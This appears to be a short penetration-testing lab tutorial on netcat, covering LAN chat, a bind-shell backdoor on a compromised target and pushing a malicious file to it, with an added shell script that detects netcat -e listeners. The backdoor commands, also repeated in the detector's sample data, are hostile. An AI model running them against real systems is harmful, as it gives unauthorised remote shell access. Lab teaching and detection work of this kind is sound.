Netcat: A Swiss Army Knife
Netcat is a simple UNIX utility that reads and writes data across network connections using TCP or UDP. It can also be used for VAPT purposes, as follows:
Deliverable:
Lab setup
Virtualization using Oracle VirtualBox
Attacker’s System: Kali Linux
Target system: any Linux or Windows
In Kali Linux --> Terminal
1. LAN chatting
Creating a listener on the target
~# nc -l -p [port number]
Here,
-l --> listener
Connecting to the listener on the target
~# nc [IP address of target] [port number]
Now you can chat between these two systems. You can stop the connection by pressing Ctrl+C.
2. Opening a command shell listener, i.e. creating a backdoor on the target after successfully exploiting it and getting its shell.
On target system
~# nc -l -p [port number] -e /bin/bash
Here,
-e --> execute
/bin/bash --> Linux shell (same as command prompt in Windows)
On attacker system
~# nc [IP address of target] [port number]
Now you can run any command on the target from the attacker system.
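From the defender's side, the listener in step 2 is visible in the process list as a netcat command line carrying -e. The script below is an added example, not part of the original page: it scans process command lines for that pattern and reports the bound program and port. The function names (check_nc, scan, sample) and the sample process list are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat command lines that attach a program to a
# socket with -e, as in "nc -l -p [port number] -e /bin/bash" above.

# check_nc "<command line>": prints "exec=<prog> listen=<yes|no> port=<n|?>"
# and returns 0 when the line is netcat with -e; returns 1 otherwise.
check_nc() {
    set -f; set -- $1; set +f          # word-split without globbing
    case "${1##*/}" in                 # basename of argv[0]
        nc|ncat|netcat|nc.traditional) ;;
        *) return 1 ;;
    esac
    shift
    exec_prog= listen=no port='?' want=
    for a in "$@"; do
        case "$want" in                # previous flag was waiting for a value
            e) exec_prog=$a; want=; continue ;;
            p) port=$a; want=; continue ;;
        esac
        case "$a" in
            --*) ;;                    # long options are ignored here
            -*)  case "$a" in *l*) listen=yes ;; esac   # -l or clustered -lvp
                 case "$a" in *e) want=e ;; *p) want=p ;; esac ;;
        esac
    done
    [ -n "$exec_prog" ] || return 1
    printf 'exec=%s listen=%s port=%s\n' "$exec_prog" "$listen" "$port"
}

# scan: read one command line per input line, print an ALERT for each hit.
scan() {
    while IFS= read -r line; do
        if out=$(check_nc "$line"); then
            printf 'ALERT %s | %s\n' "$out" "$line"
        fi
    done
}

# Constructed sample in the shape of `ps -eo args` output (not real host data).
sample() {
cat <<'EOF'
/usr/sbin/sshd -D
nc -l -p 4444 -e /bin/bash
nc -l -p 5555
/bin/nc.traditional -lvp 9001 -e /bin/sh
vim notes-e.txt
EOF
}

sample | scan
```

On a live host, replace `sample` with `ps -eo args`; the plain chat listener from step 1 (no -e) is intentionally not flagged.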
3. Sending the contents of a (malicious) file to the target system.
On target system
~# nc -l -p [port number] > [filename]
On attacker system
~# nc [IP address of target] [port number] < [path of the malicious file whose contents are to be transferred]